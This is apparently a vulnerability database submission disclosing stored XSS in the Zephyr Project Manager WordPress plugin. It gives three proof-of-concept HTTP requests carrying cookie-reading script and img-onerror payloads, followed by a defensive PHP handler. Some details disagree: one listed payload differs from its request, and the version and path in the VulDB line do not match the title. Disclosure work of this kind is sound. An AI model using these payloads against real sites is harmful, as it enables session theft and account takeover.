Submit #45806: Zephyr Project Manager 3.2.42 - Unauthorised AJAX Calls To Stored XSS

Title: Zephyr Project Manager 3.2.42 - Unauthorised AJAX Calls To Stored XSS
Description: Zephyr Project Manager is a plug-in that helps you manage all your projects and tasks and get things done effectively.

It has been determined that in most places throughout the application, the data from an input field can be injected as HTML without any sanitization or validation. The details of the discovery are given below.

## Proof of Concept (PoC)

The details of the various (Reflected and Stored) XSS issues in the application are given below.

### Endpoint Of New Discussion For Task (Stored XSS)

Steps To Reproduce:

1. Go to https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_tasks&action=view_task&task_id=1
2. Click on the Discussion tab.
3. Fill in the payload in the comment field.
4. Click on "Comment".

Sample Request:

```
POST /wp-admin/admin-ajax.php HTTP/2
Host: vuln.local
Cookie: ...
...
Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_tasks&action=view_task&task_id=1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 108
Origin: https://vuln.local
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

user_id=1&subject=task&subject_id=213&message=%3cscript%3ealert(document.cookie)%3c%2fscript%3e&type=message&action=zpm_send_comment&zpm_nonce=22858bf3a7
```

Payload: `%3cscript%3ealert(document.cookie)%3c%2fscript%3e`

Parameter(s): message

### Endpoint Of New Team and Team Update (Stored XSS)

Steps To Reproduce:

1. Go to https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_teams_members
2. Click on "New Team" or "Edit Team".
3. Fill in the payload in the team name and team description fields.
4. Click on "Create Team".

Sample Request:

```
POST /wp-admin/admin-ajax.php HTTP/2
Host: vuln.local
Cookie: ...
...
Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_teams_members
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Origin: https://vuln.local
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&description=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&action=zpm_add_team
```

Payload: `%3cscript%3ealert(document.cookie)%3c%2fscript%3e`

Parameter(s): name, description

### Endpoint Of User Access (Stored XSS)

Steps To Reproduce:

1. Go to https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_teams_members
2. Click on "Bulk Edit Access".
3. Choose any options.
4. Click on "Allow Access".
5. The "access" parameter is intercepted with a proxy.
6. Click on "Create Team".

Sample Request:

```
POST /wp-admin/admin-ajax.php HTTP/2
Host: vuln.local
Cookie: ...
...
Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_teams_members
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1103
Origin: https://vuln.local
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

user_id%5B0%5D%5Bid%5D=1&user_id%5B0%5D%5Bemail%5D=dev-email%40flywheel.local&user_id%5B0%5D%5Bname%5D=admin&user_id%5B0%5D%5Bdescription%5D=&user_id%5B0%5D%5Bavatar%5D=https%3A%2F%2Fsecure.gravatar.com%2Favatar%2Fc2b06ae950033b392998ada50767b50e%3Fs%3D96%26d%3Dmm%26r%3Dg&user_id%5B0%5D%5Bpreferences%5D%5Bnotify_activity%5D=0&user_id%5B0%5D%5Bpreferences%5D%5Bnotify_tasks%5D=1&user_id%5B0%5D%5Bpreferences%5D%5Bnotify_updates%5D=0&user_id%5B0%5D%5Bpreferences%5D%5Bnotify_task_assigned%5D=1&user_id%5B0%5D%5Bcan_zephyr%5D=true&user_id%5B1%5D%5Bid%5D=1&user_id%5B1%5D%5Bemail%5D=dev-email%40flywheel.local&user_id%5B1%5D%5Bname%5D=admin&user_id%5B1%5D%5Bdescription%5D=&user_id%5B1%5D%5Bavatar%5D=https%3A%2F%2Fsecure.gravatar.com%2Favatar%2Fc2b06ae950033b392998ada50767b50e%3Fs%3D96%26d%3Dmm%26r%3Dg&user_id%5B1%5D%5Bpreferences%5D%5Bnotify_activity%5D=0&user_id%5B1%5D%5Bpreferences%5D%5Bnotify_tasks%5D=1&user_id%5B1%5D%5Bpreferences%5D%5Bnotify_updates%5D=0&user_id%5B1%5D%5Bpreferences%5D%5Bnotify_task_assigned%5D=1&user_id%5B1%5D%5Bcan_zephyr%5D=true&access=trueo6c2i%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3eb6lt4&action=zpm_update_user_access
```

Payload: `%3cscript%3ealert(document.cookie)%3c%2fscript%3e`

Parameter(s): access
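All three requests succeed because the AJAX action stores the submitted field as-is, and the second and third requests carry no nonce at all. As an added example (not the plugin's own code), this is what a hardened admin-ajax handler for the comment action looks like: nonce and capability checks, sanitization on input, escaping on output. The nonce action string `zpm_nonce_action`, the capability `zpm_comment` and the helper `store_comment()` are assumptions; `zpm_send_comment` and `zpm_nonce` are the names seen in the PoC request.

```php
<?php
// Added defensive example, not code from Zephyr Project Manager.
// 'zpm_nonce_action', 'zpm_comment' and store_comment() are assumptions.

add_action( 'wp_ajax_zpm_send_comment', 'example_zpm_send_comment' );

function example_zpm_send_comment() {
    // 1. Reject calls without a valid nonce; check_ajax_referer() dies on failure.
    check_ajax_referer( 'zpm_nonce_action', 'zpm_nonce' );

    // 2. Require an explicit capability instead of trusting any logged-in user.
    if ( ! current_user_can( 'zpm_comment' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }

    // 3. Never trust a client-supplied user_id; take the identity from the session.
    $user_id    = get_current_user_id();
    $subject    = sanitize_key( wp_unslash( $_POST['subject'] ?? '' ) );
    $subject_id = absint( $_POST['subject_id'] ?? 0 );

    // 4. Sanitize on input: sanitize_text_field() strips all tags, so the
    //    <script> payload from the PoC is reduced to plain text before storage.
    //    If limited markup must be kept, use wp_kses_post() instead.
    $message = sanitize_text_field( wp_unslash( $_POST['message'] ?? '' ) );

    if ( '' === $message || 0 === $subject_id ) {
        wp_send_json_error( array( 'message' => 'invalid input' ), 400 );
    }

    // Hypothetical persistence helper; returns the new comment id.
    $comment_id = store_comment( $user_id, $subject, $subject_id, $message );

    // 5. Escape on output too, so stored data is never echoed as raw HTML.
    wp_send_json_success( array(
        'id'      => $comment_id,
        'message' => esc_html( $message ),
    ) );
}
```

The same pattern applies to the `zpm_add_team` and `zpm_update_user_access` actions: the `name`, `description` and `access` values must be sanitized before they are stored and escaped wherever they are rendered.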
Source: https://wpscan.com/vulnerability/bfd8a7aa-5977-4fe5-b2fc-12bf93caf3ed
User: r1z4x (UID 31999)
Submission: 09/13/2022 14:39 (4 years ago)
Moderation: 09/23/2022 08:58 (10 days later)
Status: Accepted
VulDB entry: 209370 [Zephyr Project Manager up to 3.2.4 on WordPress REST Call /v1/tasks/create/ onanimationstart cross site scripting]
Points: 20
